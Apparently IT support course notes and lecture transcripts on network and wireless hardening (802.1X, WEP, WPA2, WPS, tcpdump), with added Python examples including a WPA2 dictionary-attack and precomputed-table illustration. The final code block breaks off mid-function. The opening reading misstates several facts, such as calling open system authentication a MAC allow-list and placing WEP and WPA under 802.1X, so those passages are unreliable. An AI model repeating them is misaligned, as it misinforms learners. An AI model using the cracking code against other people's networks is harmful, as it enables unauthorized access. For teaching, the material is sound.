Authentication occurs when a client first connects to a network. The client sends a packet of information
and the authenticator sends the packet to the authentication server. In some instances, the authenticator
and authentication server may be integrated into a single point. The authentication server then verifies the
identity or key against the information in its database. If the credentials are valid, the authentication
succeeds. Then the server begins processing the connection request. If the credentials are not valid, the
authentication fails. The authentication server sends an Access Reject message and the connection request
is denied.

Authentication methods

When the request is sent to the authentication server there are a couple of methods for authentication.
IEEE defines two different link-level authentication methods:

- Shared key system is a shared key or passphrase that is manually set on both the mobile device
and the AP/router.
- Open system is when the authentication server has a list of authorized clients to check against
when a client requests access. This list is usually in the form of MAC addresses but it varies by
network.

Shared Key authentication methods
There are several shared key authentication methods that are commonly used:

- Wired Equivalent Privacy (WEP) is not recommended for a secure WLAN. The main security risk
is hackers capturing the encrypted form of an authentication response frame, using widely
available software applications, and using the information to crack WEP encryption.
- Wi-Fi Protected Access (WPA) complies with the wireless security standard and strongly
increases the level of data protection and access control (authentication) for a wireless network.
WPA enforces IEEE 802.1X authentication and key-exchange and only works with dynamic
encryption keys.
- Wi-Fi Protected Access 2 (WPA2) is a security enhancement to WPA. Users must ensure the
mobile device and AP/router are configured using the same WPA version and pre-shared key (PSK).
- Association allows the access point or router to record each mobile device so that data is properly
delivered. This occurs after authentication is complete.

These authentication methods are standardized under the IEEE 802.1X protocol.

Key takeaways
IEEE 802.1X is a protocol developed to let clients connect to port-based networks using modern
authentication methods.

- There are three nodes in the authentication process: supplicant, authenticator, and authentication
server.
- The authentication server uses either a shared key system or open access system to control who is
able to connect to the network.
- Based on the criteria of the authentication server, the supplicant will either be granted the authentication
request and begin the connection process, or it will be sent an Access Reject message and the
connection will be terminated.
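The three-role exchange described in this reading, played out in a small Python simulation. This is an added example for these notes, not code from IEEE 802.1X or any RADIUS product: the credential database, the device names and the frame dictionaries are constructed, and the single `credential` field stands in for whatever EAP method would actually carry the proof of identity. What it shows is the authenticator's behaviour: it relays only authentication traffic to the server, drops everything else until the server answers Access-Accept, and tracks authorization per supplicant.

```python
from dataclasses import dataclass, field


@dataclass
class AuthenticationServer:
    """Holds the credential database and answers the authenticator's requests."""
    users: dict  # constructed: identity -> secret

    def check(self, identity, secret):
        return "Access-Accept" if self.users.get(identity) == secret else "Access-Reject"


@dataclass
class Authenticator:
    """The switch port or access point. It forwards EAP traffic to the server and
    drops all other frames from a supplicant until the server accepts it."""
    server: AuthenticationServer
    authorized: set = field(default_factory=set)
    log: list = field(default_factory=list)

    def receive(self, supplicant_id, frame):
        kind = frame["type"]
        if kind == "EAPOL":
            verdict = self.server.check(frame["identity"], frame["credential"])
            self.log.append((supplicant_id, "EAP", verdict))
            if verdict == "Access-Accept":
                self.authorized.add(supplicant_id)
            return verdict
        if supplicant_id in self.authorized:
            self.log.append((supplicant_id, kind, "forwarded"))
            return "forwarded"
        self.log.append((supplicant_id, kind, "dropped"))   # pre-authentication data is dropped
        return "dropped"


def run_exchange():
    """One constructed session: data before auth, a bad attempt, a good one, then data."""
    server = AuthenticationServer(users={"alice": "correct horse"})
    port = Authenticator(server)
    return [
        port.receive("laptop-1", {"type": "IPv4"}),
        port.receive("laptop-1", {"type": "EAPOL", "identity": "alice", "credential": "wrong"}),
        port.receive("laptop-1", {"type": "EAPOL", "identity": "alice", "credential": "correct horse"}),
        port.receive("laptop-1", {"type": "IPv4"}),
        port.receive("laptop-2", {"type": "IPv4"}),   # a different, unauthenticated device
    ]
```

The sequence returned by `run_exchange()` is dropped, Access-Reject, Access-Accept, forwarded, dropped: the second device stays blocked even though the first one has been admitted on the same authenticator.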

Hey, welcome back. In the last lesson, we covered network hardware hardening security measures, which you should be aware of as an IT support specialist. Now, we're going to shift to network software hardening techniques. Just like with network hardware hardening, it's important for you to know how to implement network software hardening, which includes things like firewalls, proxies, and VPNs. These security software solutions will play an important role in securing networks and their traffic for your organization.

Like we mentioned before, firewalls are critical to securing a network. They can be deployed as dedicated network infrastructure devices which regulate the flow of traffic for a whole network. They can also be host-based, as software that runs on a client system providing protection for that one host only. It's generally recommended to deploy both solutions. A host-based firewall provides protection for mobile devices, such as a laptop that could be used in an untrusted, potentially malicious environment, like an airport Wi-Fi hotspot. Host-based firewalls are also useful for protecting other hosts from being compromised by a corrupted device on the internal network. That's something a network-based firewall may not be able to help defend against. You will almost definitely encounter host-based firewalls, since all major operating systems have built-in ones today. It's also very likely that your company will have some kind of network-based firewall. Your router at home even has a network-based firewall built in.

VPNs are also recommended to provide secure access to internal resources for mobile or roaming users. We won't go back over all the details, but here's a quick rundown. VPNs are commonly used to provide secure remote access and to link two networks securely. Let's say we have two offices, located in buildings that are on opposite sides of town. We want to create one unified network that would let users in each location seamlessly connect to devices and services in either location. We could use a site-to-site VPN to link these two offices. To the people in the offices, everything would just work. They'd be able to connect to a service hosted in the other office without any specific configuration. Using a VPN tunnel, all traffic between the two offices can be secured using encryption. This lets the two remote networks join each other seamlessly. This way, clients on one network can access devices on the other without requiring them to individually connect to a VPN service. Usually, the same infrastructure can be used to allow remote access VPN services for individual clients that require access to internal resources while out of the office.

Proxies can be really useful to protect client devices and their traffic. They also provide secure remote access without using a VPN. A standard web proxy can be configured for client devices. This allows web traffic to be proxied through a proxy server that we control, for lots of purposes. This configuration can be used for logging web requests of client devices. These logs can be used for traffic analysis and forensic investigation. The proxy server can be configured to block content that might be malicious, dangerous, or just against company policy. A reverse proxy can be configured to allow secure remote access to web-based services without requiring a VPN. Now, as an IT support specialist, you may need to configure or maintain a reverse proxy service as an alternative to a VPN. By configuring a reverse proxy at the edge of your network, connection requests to services inside the network coming from outside are intercepted by the reverse proxy. They are then forwarded on to the internal service, with the reverse proxy acting as a relay. This bridges communications between the remote client outside the network and the internal service. This proxy setup can be secured even more by requiring the use of client TLS certificates, along with username and password authentication. Specific ACLs can also be configured on the reverse proxy to restrict access even more. Lots of popular proxy solutions support a reverse proxy configuration, like HAProxy, Nginx, and even the Apache web server.

Supplementary reading on HAProxy, nginx and Apache HTTP server
We've included the main documentation for each product we mention, as well as a direct link to the
documentation that covers reverse proxying specifically.

HAProxy main documentation

HAProxy reverse proxy documentation

nginx main documentation

nginx reverse proxy documentation

Apache HTTP server main documentation

Apache HTTP server reverse proxy documentation

In this lesson, we'll cover the best practices for implementing wireless security. As an IT support specialist, you'll be responsible for Wi-Fi configuration and infrastructure. Understanding the security options available for wireless networks is super important to making sure that the best solution is chosen. We already covered the nuts and bolts of the wireless 802.11 protocol and explained how wireless networks work. We won't rehash that, but we'll take a closer look at the security implementations available to protect wireless networks. Before we jump into the nitty-gritty details of wireless security, take a second and ask yourself this question: what do you think the best security option is for securing a Wi-Fi network? It's okay if you're not sure. Just keep this question in mind as we go over all the options available along with their benefits and drawbacks. Spoiler alert: there's some pretty technical security stuff coming your way, so put your thinking caps on.

The first security protocol introduced for Wi-Fi networks was WEP, or Wired Equivalent Privacy. It was part of the original 802.11 standard introduced back in 1997. WEP was intended to provide privacy on par with a wired network. That means the information passed over the network should be protected from third parties eavesdropping. This was an important consideration when designing the wireless specification. Unlike wired networks, packets could be intercepted by anyone with physical proximity to the access point or client station. Without some form of encryption to protect the packets, wireless traffic would be readable by anyone nearby who wants to listen. WEP was proven to be seriously bad at providing confidentiality or security for wireless networks. It was quickly deprecated in 2004 in favor of more secure systems. Even so, we'll cover it here for historical purposes. I want to drive home the point that no one should be using WEP anymore. You never know: you may see seriously outdated systems when working as an IT support specialist. It's important that you fully understand why WEP is outdated and what you can do instead.

WEP used the RC4 symmetric stream cipher for encryption. It used either a 40-bit or 104-bit shared key, from which the encryption key for individual packets was derived. The actual encryption key for each packet was computed by taking the user-supplied shared key and then joining a 24-bit initialization vector, or IV for short. It's a randomized bit of data to avoid reusing the same encryption key between packets. Since these bits of data are concatenated, or joined, a 40-bit shared key scheme uses a 64-bit key for encryption, and the 104-bit scheme uses a 128-bit key. Originally, WEP encryption was limited to 64-bit only because of US export restrictions placed on encryption technologies. Once those laws were changed, 128-bit encryption became available for use. The shared key was entered as either 10 hexadecimal characters for 40-bit WEP or 26 hex characters for 104-bit WEP, each hex character being four bits. The key could also be specified by supplying five ASCII characters for 40-bit WEP or 13 for 104-bit WEP, each ASCII character representing eight bits. But this actually reduces the available keyspace to only valid ASCII characters instead of all possible hex values. Since this is a component of the actual key, the shared key must be exactly as many characters as appropriate for the encryption scheme.

WEP authentication originally supported two different modes: open system authentication and shared key authentication. The open system mode didn't require clients to supply credentials. Instead, they were allowed to authenticate and associate with the access point, but the access point would begin communicating with the client by encrypting data frames with the pre-shared WEP key. If the client didn't have the key or had an incorrect key, it wouldn't be able to decrypt the frames coming from the access point, or AP. It also wouldn't be able to communicate back to the AP. Shared key authentication worked by requiring clients to authenticate through a four-step challenge-response process. This basically has the AP asking the client to prove that it has the correct key. Here's how it works. The client sends an authentication request to the AP. The AP replies with a clear text challenge, a bit of randomized data that the client is supposed to encrypt using the shared WEP key. The client replies to the AP with the resulting ciphertext from encrypting this challenge text. The AP verifies this by decrypting the response and checking it against the plaintext challenge text. If they match, a positive response is sent back. Does anything jump out at you as potentially insecure in this scheme? We're transmitting both the plaintext and the ciphertext in a way that exposes both of these messages to potential eavesdroppers. This opens the possibility for the encryption key to be recovered by the attacker. A general concept in security and encryption is to never send the plaintext and ciphertext together, so that attackers can't work out the key used for encryption.

But WEP's true weakness wasn't related to the authentication schemes. Its use of the RC4 stream cipher and how the IVs were used to generate encryption keys led to WEP's ultimate downfall. The primary purpose of an IV is to introduce more random elements into the encryption key to avoid reusing the same one. When using a stream cipher like RC4, it's super important that an encryption key doesn't get reused. This would allow an attacker to compare two messages encrypted using the same key and recover information. But the encryption key in WEP is just made up of the shared key, which doesn't change frequently, with 24 bits of randomized data, the IV, tacked onto the end of it. This results in only a 24-bit pool from which unique encryption keys will be drawn. Since the IV is made up of 24 bits of data, the total number of possible values is not very big by modern computing standards. That's only about 17 million possible unique IVs, which means after roughly 5,000 packets, an IV will be reused. When an IV is reused, the encryption key is also reused. It's also important to call out that the IV is transmitted in plain text. If it were encrypted, the receiver would not be able to decrypt it. This means an attacker just has to keep track of IVs and watch for repeated ones. The actual attack that lets an attacker recover the WEP key relies on weaknesses in some IVs and how the RC4 cipher generates a key-stream used for encrypting the data payloads. This lets the attacker reconstruct this key-stream using packets encrypted using the weak IVs. The details of the attack are outside what we'll cover in this course. You can also take a look at open source tools that demonstrate this attack in action, like Aircrack-ng or AirSnort. They can recover a WEP key in a matter of minutes. It's terrifying to think about.

You might be asking yourself why it's important to know WEP since it's not recommended for use anymore. Well, as an IT support specialist, you might encounter some cases where legacy hardware is still running WEP. It's important to understand the security implications of using this broken security protocol, so you can prioritize upgrading away from WEP.
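Two of the points above, that a stream cipher must never reuse a key and that a 24-bit IV pool runs out after roughly 5,000 packets, worked through in Python. This is an added example for these notes, not code from the course or from any Wi-Fi implementation. It uses a textbook RC4 and a WEP-style per-packet key (real WEP places the IV in front of the shared key); the shared key, IV and two packet payloads are constructed. The first function shows why reusing an IV leaks information: two ciphertexts made with the same keystream XOR to the XOR of their plaintexts, which an observer can compute without ever knowing the key. The second gives the birthday-bound estimate behind the "roughly 5,000 packets" figure.

```python
import math


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Textbook RC4 key scheduling plus keystream generation."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    while len(out) < length:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(shared_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP-style encryption: per-packet key = IV || shared key, IV sent in the clear."""
    assert len(iv) == 3 and len(shared_key) in (5, 13)   # 24-bit IV, 40- or 104-bit key
    keystream = rc4_keystream(iv + shared_key, len(plaintext))
    return bytes(p ^ k for p, k in zip(plaintext, keystream))


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def iv_reuse_leaks() -> bool:
    """Encrypt two constructed packets under the same IV and check that an observer
    holding only the ciphertexts can compute plaintext1 XOR plaintext2."""
    shared_key = b"\x01\x02\x03\x04\x05"        # constructed 40-bit key
    iv = b"\xaa\xbb\xcc"                        # the same IV used twice
    p1 = b"GET /index.html HTTP/1.1"
    p2 = b"POST /login.php HTTP/1.1"
    c1 = wep_encrypt(shared_key, iv, p1)
    c2 = wep_encrypt(shared_key, iv, p2)
    return xor(c1, c2) == xor(p1, p2)           # keystream cancels out


def iv_collision_probability(packets: int, iv_bits: int = 24) -> float:
    """Birthday-bound estimate of the chance that some IV has repeated after `packets` packets."""
    pool = 2 ** iv_bits
    return 1 - math.exp(-packets * (packets - 1) / (2 * pool))
```

With random IVs, `iv_collision_probability(5000)` comes out a little over one half, which is where the lecture's "roughly 5,000 packets" figure comes from; `iv_reuse_leaks()` returns True, confirming that a repeated IV hands an eavesdropper the XOR of two plaintexts.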

Supplementary reading for WEP Encryption and Why You Shouldn't Use It
Fluhrer S., Mantin I., Shamir A. (2001) Weaknesses in the Key Scheduling Algorithm of RC4. In: Vaudenay S.,
Youssef A.M. (eds) Selected Areas in Cryptography. SAC 2001. Lecture Notes in Computer Science, vol 2259.
Springer, Berlin, Heidelberg https://doi.org/10.1007/3-540-45537-X_1

The replacement for WEP from the Wi-Fi Alliance was WPA, or Wi-Fi Protected Access. WPA was designed as a short-term replacement that would be compatible with older WEP-enabled hardware with a simple firmware update. This helped with user adoption because it didn't require the purchase of new Wi-Fi hardware. To address the shortcomings of WEP security, a new security protocol was introduced called TKIP, or the Temporal Key Integrity Protocol. TKIP implemented three new features that made it more secure than WEP. First, a more secure key derivation method was used to more securely incorporate the IV into the per-packet encryption key. Second, a sequence counter was implemented to prevent replay attacks by rejecting out-of-order packets. Third, a 64-bit MIC, or message integrity check, was introduced to prevent forging, tampering, or corruption of packets. TKIP still used the RC4 cipher as the underlying encryption algorithm, but it addressed the key generation weaknesses of WEP by using a key mixing function to generate unique encryption keys per packet. It also utilizes 256-bit long keys. This key mixing function incorporates the long-lived Wi-Fi passphrase with the IV. This is different compared to the simplistic concatenation of the shared key and IV.

Under WPA, the pre-shared key is the Wi-Fi password you share with people when they come over and want to use your wireless network. This is not directly used to encrypt traffic. It's used as a factor to derive the encryption key. The passphrase is fed into PBKDF2, or Password-Based Key Derivation Function 2, along with the Wi-Fi network's SSID as a salt. This is then run through the HMAC-SHA1 function 4,096 times to generate a unique encryption key. The SSID salt is incorporated to help defend against rainbow table attacks. The 4,096 rounds of HMAC-SHA1 increase the computational power required for a brute force attack. I should call out that the pre-shared key can be entered using two different methods. A 64-character hexadecimal value can be entered, in which case that value is used directly as the key: 64 hexadecimal characters times 4 bits each is 256 bits. The other option is to use the PBKDF2 function, but only if entering ASCII characters as a passphrase. If that's the case, the passphrase can be anywhere from 8 to 63 characters long.
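The PSK derivation just described, in Python: PBKDF2 with HMAC-SHA1, the SSID as salt, 4,096 rounds and a 256-bit output, plus the two entry methods (64 hex digits used verbatim, or an 8-63 character ASCII passphrase). This is an added example for these notes, not code from the course or from any Wi-Fi driver. Alongside the standard-library `hashlib.pbkdf2_hmac` call, PBKDF2 is written out step by step so the 4,096 chained HMACs are visible; the SSID and passphrase values are constructed. Comparing the key for the same passphrase under two SSIDs shows why the SSID salt defeats precomputed (rainbow) tables unless the SSID itself is common.

```python
import hashlib
import hmac
import struct


def pbkdf2_sha1_manual(passphrase: bytes, salt: bytes, iterations: int, dklen: int) -> bytes:
    """PBKDF2 written out: DK = T1 || T2 || ..., T_i = U1 ^ U2 ^ ... ^ U_c,
    U1 = HMAC(P, S || INT(i)), U_j = HMAC(P, U_{j-1})."""
    out = b""
    block = 1
    while len(out) < dklen:
        u = hmac.new(passphrase, salt + struct.pack(">I", block), hashlib.sha1).digest()
        t = bytearray(u)
        for _ in range(iterations - 1):
            u = hmac.new(passphrase, u, hashlib.sha1).digest()
            t = bytearray(a ^ b for a, b in zip(t, u))
        out += bytes(t)
        block += 1
    return out[:dklen]


def is_hex_psk(secret: str) -> bool:
    """64 hex digits: the 256-bit key entered directly."""
    return len(secret) == 64 and all(c in "0123456789abcdefABCDEF" for c in secret)


def passphrase_is_acceptable(secret: str) -> bool:
    """An ASCII passphrase must be 8 to 63 characters long."""
    return 8 <= len(secret) <= 63 and secret.isascii()


def wpa_psk(ssid: str, secret: str) -> bytes:
    """Return the 256-bit PSK for a network, from either entry method."""
    if is_hex_psk(secret):
        return bytes.fromhex(secret)
    if not passphrase_is_acceptable(secret):
        raise ValueError("passphrase must be 8-63 ASCII characters or 64 hex digits")
    # PBKDF2-HMAC-SHA1, SSID as salt, 4,096 rounds, 32 bytes (256 bits) of output.
    return hashlib.pbkdf2_hmac("sha1", secret.encode(), ssid.encode(), 4096, 32)


def ssid_changes_key(secret: str = "correct horse battery") -> bool:
    """Same passphrase, two constructed SSIDs: the derived keys differ."""
    return wpa_psk("HomeNetwork", secret) != wpa_psk("HomeNetwork-2", secret)
```

Because the standard-library call and the hand-written loop agree, the block doubles as a check that the derivation is exactly what the lecture states: a salted HMAC-SHA1 chain 4,096 deep, with the SSID as the salt.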
You might encounter WPS in a small IT shop that uses commercial SOHO routers. It can be useful in these smaller environments to make it easier to join wireless clients to the wireless network securely, but there are security implications to having it enabled that you should be aware of. The Wi-Fi Alliance introduced WPS in 2006. It provides several different methods that allow a wireless client to securely join a wireless network without having to directly enter the pre-shared key. This facilitates the use of very long and secure passphrases without making it unnecessarily complicated. WPS simplifies this by allowing for secure exchange of the SSID and pre-shared key. This is done after authenticating or exchanging data using one of the four supported methods. WPS supports PIN entry authentication, NFC or USB for out-of-band exchange of the network details, or push button authentication. You've probably seen the push button mechanism. It's typically a small button somewhere on the home router with two arrows pointing counterclockwise. The push button mechanism works by requiring a button to be pressed on both the AP side and the client side. This requires physical proximity and a short window of time in which the client can authenticate with a button press of its own. The NFC and USB methods just provide a different channel to transmit the details to join the network.

The PIN methods are really interesting, and also where a critical flaw was introduced. The PIN authentication mechanism supports two modes. In one mode, the client generates a PIN, which is then entered into the AP. In the other mode, the AP has a PIN, typically hard-coded into the firmware, which is entered into the client. It's the second mode that is vulnerable to an online brute force attack. The PIN authentication method uses PINs that are eight digits long, but the last digit is a checksum that's computed from the first seven digits. This makes the total number of possible PINs 10^7, or around 10 million possibilities. But the PIN is authenticated by the AP in halves. This means the client will send the first four digits to the AP, wait for a positive or negative response, and then send the second half of the PIN if the first half was correct. Did you see anything wrong with this scenario? We're actually reducing the total possible valid PINs even more and making it even easier to guess what the correct PIN is. The first half of the PIN, being four digits, has about 10,000 possibilities. The second half, only three digits because of the checksum value, has a maximum of only 1,000 possibilities. This means the correct PIN can be guessed in a maximum of 11,000 tries. It sounds like a lot, but it really isn't. Without any rate limiting, an attacker could recover the PIN and the pre-shared key in less than four hours. In response to this, the Wi-Fi Alliance revised the requirements for the WPS specification, introducing a lockout period of one minute after three incorrect PIN attempts. This increases the maximum time to guess the PIN from four hours to less than three days. That's easily in the realm of possibility for a determined and patient attacker, but it gets worse. If your network is compromised using this attack, then because the PIN is an unchanging element that's part of the AP configuration, the attacker could just reuse the already recovered WPS PIN to get the new password. This would happen even if you detected unauthorized wireless clients on your network and changed your Wi-Fi password.
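The arithmetic behind the WPS PIN numbers above (the checksum digit, 10^7 valid PINs, 10,000 + 1,000 = 11,000 guesses once the PIN is checked in halves, and the effect of the one-minute lockout), worked through in Python. This is an added example for these notes, not code from the course or from any WPS implementation; the checksum rule is the published one from the WPS specification (odd-position digits weighted 3, even-position digits weighted 1, checksum makes the total a multiple of 10), and the time estimates are upper bounds that assume the lockout is the only limit on guessing.

```python
def wps_checksum(first_seven: str) -> int:
    """Checksum digit for a 7-digit WPS PIN body, as defined by the WPS specification."""
    acc = 0
    for i, ch in enumerate(first_seven):
        acc += (3 if i % 2 == 0 else 1) * int(ch)
    return (10 - acc % 10) % 10


def is_valid_pin(pin: str) -> bool:
    """True if pin is 8 digits and its last digit is the correct checksum."""
    return len(pin) == 8 and pin.isdigit() and wps_checksum(pin[:7]) == int(pin[7])


def valid_pin_count() -> int:
    """Seven free digits; the eighth is determined by them."""
    return 10 ** 7


def split_half_guesses() -> int:
    """Worst case when the AP confirms each half separately: 4 free digits,
    then 3 free digits (the checksum fixes the last one)."""
    return 10 ** 4 + 10 ** 3


def worst_case_hours_with_lockout(attempts_before_lockout: int = 3,
                                  lockout_minutes: float = 1.0) -> float:
    """Upper bound on wall-clock time to exhaust the split search space when the AP
    locks for lockout_minutes after attempts_before_lockout failures."""
    minutes = split_half_guesses() / attempts_before_lockout * lockout_minutes
    return minutes / 60
```

With the revised specification's three attempts per one-minute lockout, the 11,000 guesses take a little over 61 hours at most, which is the "less than three days" quoted in the lecture; without a lockout, the count alone gives no protection at all. The same functions let you check whether a PIN printed on a device is even well formed before deciding, as the lecture recommends, to turn the feature off.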

Supplementary reading on WiFi Protected Setup (WPS) PIN brute force vulnerability
For more information on this Video Lecture check out the following links:

WiFi Protected Setup (WPS) PIN brute force vulnerability

Now that we've covered the security options 


available for protecting wireless networks, 
what do you think the most secure option would be?
In an ideal world, we'd all be protecting our wireless networks using 802.1X with EAP-TLS.
It offers arguably the best security available, assuming proper and secure handling of the PKI aspects of it.
But this option also requires a ton of added complexity and overhead.
This is because it requires, at a minimum, a RADIUS server and an additional authentication back-end.
If EAP-TLS is implemented, then all the public key infrastructure components will also be necessary, which adds even more complexity and management overhead.
Not only do you have to securely deploy PKI on the back-end for certificate management, but a system must be in place to sign the client certificates.
You also have to distribute them to each client that will be authenticating to the network, and revoke them when a device is lost or decommissioned.
This is usually more overhead than many companies are willing to take on because of the security versus convenience trade-off involved.
If 802.1X is too complicated for a company, the next best alternative would be WPA2 with AES/CCMP mode.
But to protect against brute force or rainbow table attacks, we should take some steps to raise the computational bar.
A long and complex passphrase that wouldn't be found in a dictionary would increase the amount of time and resources an attacker would need to break the passphrase.
Changing the SSID to something uncommon and unique would also make a rainbow table attack less likely, because the SSID is the salt in the WPA2 key derivation.
It would require an attacker to do the computations themselves, increasing the time and resources required to pull off an attack.
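To make the salt argument concrete, here is an added example (not from the course) of the WPA2-PSK key derivation as specified in IEEE 802.11i: the Pairwise Master Key is PBKDF2-HMAC-SHA1 over the passphrase with the SSID as salt, 4096 iterations, 32 bytes. The wordlist and SSIDs below are constructed; the `dictionary_attack` and `precomputed_table` functions are illustrations of the attacker's two options, not tools from the course.

```python
# Added example (not from the course): WPA2-PSK key derivation, showing why
# the SSID acts as a salt and why a long passphrase raises the attacker's cost.
import hashlib
import time
from typing import Dict, Iterable, Optional


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """Pairwise Master Key as defined in IEEE 802.11i:
    PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, dklen=32)


def dictionary_attack(target_pmk: bytes, ssid: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline attack against a captured handshake: derive the PMK for each
    candidate passphrase and compare. Every guess costs 4096 HMAC rounds."""
    for word in wordlist:
        if wpa2_pmk(word, ssid) == target_pmk:
            return word
    return None


def precomputed_table(ssid: str, wordlist: Iterable[str]) -> Dict[bytes, str]:
    """What a 'rainbow table' for WPA2 really is: the PMKs for a wordlist,
    computed once for ONE SSID. Lookups are then free, but only for that SSID."""
    return {wpa2_pmk(w, ssid): w for w in wordlist}


def guesses_per_second(samples: int = 20) -> float:
    """Rough single-core guess rate on this machine (CPU-bound)."""
    start = time.perf_counter()
    for i in range(samples):
        wpa2_pmk(f"candidate{i}", "bench")
    return samples / (time.perf_counter() - start)


if __name__ == "__main__":
    # Constructed wordlist of the kind a dictionary attack would use.
    wordlist = ["monkey", "football", "password", "letmein"]
    table = precomputed_table("linksys", wordlist)      # a common default SSID
    print("hit for default SSID:", table.get(wpa2_pmk("password", "linksys")))
    print("hit for unique SSID: ", table.get(wpa2_pmk("password", "MyUniqueSSID-7f3a")))
    print(f"about {guesses_per_second():.0f} guesses/s on one core in pure Python")
```

Two things to take from running it: the same passphrase yields a completely different PMK under a different SSID, so a table built for `linksys` is useless against a unique SSID, and each guess costs 4096 HMAC iterations, so the only thing that keeps an attacker with a captured handshake out is a passphrase that is not in any wordlist they can afford to run.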
When using a long and complex Wi-Fi password, you might be tempted to use WPS to join clients to the network.
But we saw earlier that this might not be a good idea from a security perspective.
In practice, you won't see WPS enabled in an enterprise environment because it's a consumer-oriented technology.
If your company values security over convenience, you should make sure that WPS isn't enabled on your APs.
Make sure this feature is disabled in your AP's management console.
You might also want to verify the feature is actually disabled using a tool like wash, which scans and enumerates APs that have WPS enabled.
This independent verification is recommended, since some router manufacturers don't allow you to disable it, and in some cases disabling the feature through the management console doesn't actually disable it.
Now in order to monitor what type of traffic is on your network you need 
a mechanism to capture packets from network traffic for analysis and 
potential logging. 
Packet sniffing or packet capture is the process of intercepting network packets in 
their entirety for analysis. 
It's an invaluable tool for IT support specialists to troubleshoot issues. 
There are lots of tools that make this really easy to do. 
Before we dive into the details of how to use them, 
let's cover some basic concepts of packet sniffing. 
By default, a network interface and the networking stack on an OS behave like a well-mannered interface.
They only accept and process frames addressed to the interface's own address, usually identified by its MAC address (plus broadcast and any multicast groups it has joined).
If a frame with a different destination address is encountered, the interface will just drop it.
But if we wanted to capture all packets that an interface is able to see like 
when we're monitoring all network traffic on a network segment, 
this behavior would be a pain for us. 
To override this we can place the interface into what's called 
promiscuous mode. 
This is a special mode for 
ethernet network interfaces that basically says give me all the packets. 
Instead of only accepting and handling packets destined for its address, 
it will now accept and process any packet that it sees. 
This is much more useful for network analysis or monitoring purposes. 
I should also call out that admin or root privileges are needed 
to place an interface into promiscuous mode and to begin to capture packets. 
Many packet capture tools will handle this for you too. 
Another super important thing to consider when you perform packet captures 
is whether you have access to the traffic you like to capture and monitor. 
Let's say you wanted to analyze all traffic between hosts 
connected to a switch and your machine is also connected to a port on this switch. 
What traffic would you be able to see in this case?

Tcpdump is 
a super popular lightweight command line-based utility 
that you can use to capture and analyze packets. 
Tcpdump uses the open-source libpcap library. 
That's a very popular packet capture library that's 
used in a lot of packet capture and analysis tools. 
Tcpdump also supports writing 
packet captures to a file for later analysis, 
sharing or replaying traffic. 
It also supports reading 
packet captures back from a file. 
Tcpdump's default operating mode 
is to provide a brief packet analysis. 
It converts key information from layers 
3 and up into human-readable formats. 
Then it prints information about 
each packet to standard 
out or directly into your terminal. 
It does things like converting the source 
and destination IP addresses into 
the dotted quad format we're most used to and 
it shows the port numbers 
being used by the communications. 
Let's quickly walk through 
the output of a sample Tcpdump. 
The first bit of information is fairly straightforward: a timestamp that represents when the packet on this line was processed by the kernel, in local time.
Next, the Layer 3 protocol is identified; in this case, it's IPv4.
After this, the connection quad is shown: the source address, source port, destination address, and destination port.
Next come the TCP flags and the TCP sequence number set on the packet, if there are any.
This is followed by the ACK number, the TCP window size, and then the TCP options, if any are set.
Finally, we have the payload size in bytes.
Remember these from a few lessons ago when we covered networking?
Tcpdump allows us to actually inspect these values from packets directly.
I want to call out that tcpdump by default will attempt to resolve host addresses to host names.
It will also replace port numbers with the commonly associated services that use those ports.
You can override this behavior with the -n flag, which is a good habit during an investigation anyway, since the reverse DNS lookups generate traffic of their own and can slow the capture down.
It's also possible to view the actual raw data that makes up the packet.
This is represented as hexadecimal digits by using the -x flag, or -X if you also want the ASCII interpretation of the data alongside the hex.
Remember that packets are just collections of data, groupings of ones and zeros.
They represent information depending on the values of this data and where they appear in the data stream.
Think back to packet headers and how those are structured and formatted.
The view tcpdump gives us lets us see the data that fits into the various fields that make up the headers for each layer in a packet.
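To see where those fields actually live in the bytes, here is an added example (not from the course, and not tcpdump's own code) that parses a raw Ethernet/IPv4/TCP frame into the values a tcpdump summary line shows and prints a -X style hex/ASCII dump. The frame is constructed in the block (checksums are left zero, which a real capture tool would flag), and the addresses come from the documentation ranges.

```python
# Added example (not from the course): a minimal decoder that turns a raw
# Ethernet/IPv4/TCP frame into the fields a tcpdump summary line shows, plus a
# -X style hex/ASCII dump. The sample frame is constructed; checksums are 0.
import socket
import struct
from datetime import datetime

# tcpdump prints flag letters in this bit order, with "." standing for ACK.
TCP_FLAGS = [(0x01, "F"), (0x02, "S"), (0x04, "R"), (0x08, "P"),
             (0x10, "."), (0x20, "U"), (0x40, "E"), (0x80, "W")]


def flag_str(flags: int) -> str:
    return "".join(ch for bit, ch in TCP_FLAGS if flags & bit)


def build_frame(src_ip, dst_ip, sport, dport, seq, ack, flags, win, payload):
    """Construct an Ethernet II frame carrying IPv4/TCP (test input only)."""
    eth = bytes.fromhex("aabbccddeeff") + bytes.fromhex("001122334455") + struct.pack("!H", 0x0800)
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, ack, 5 << 4, flags, win, 0, 0)
    total_len = 20 + len(tcp) + len(payload)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0x1234, 0x4000, 64, 6, 0,
                     socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    return eth + ip + tcp + payload


def decode_frame(frame: bytes) -> dict:
    """Parse the headers tcpdump summarises (layer 3 and up)."""
    ethertype, = struct.unpack("!H", frame[12:14])
    if ethertype != 0x0800:
        raise ValueError("only IPv4 handled in this example")
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4                     # header length in bytes
    total_len, = struct.unpack("!H", ip[2:4])
    proto = ip[9]
    src, dst = socket.inet_ntoa(ip[12:16]), socket.inet_ntoa(ip[16:20])
    if proto != 6:
        raise ValueError("only TCP handled in this example")
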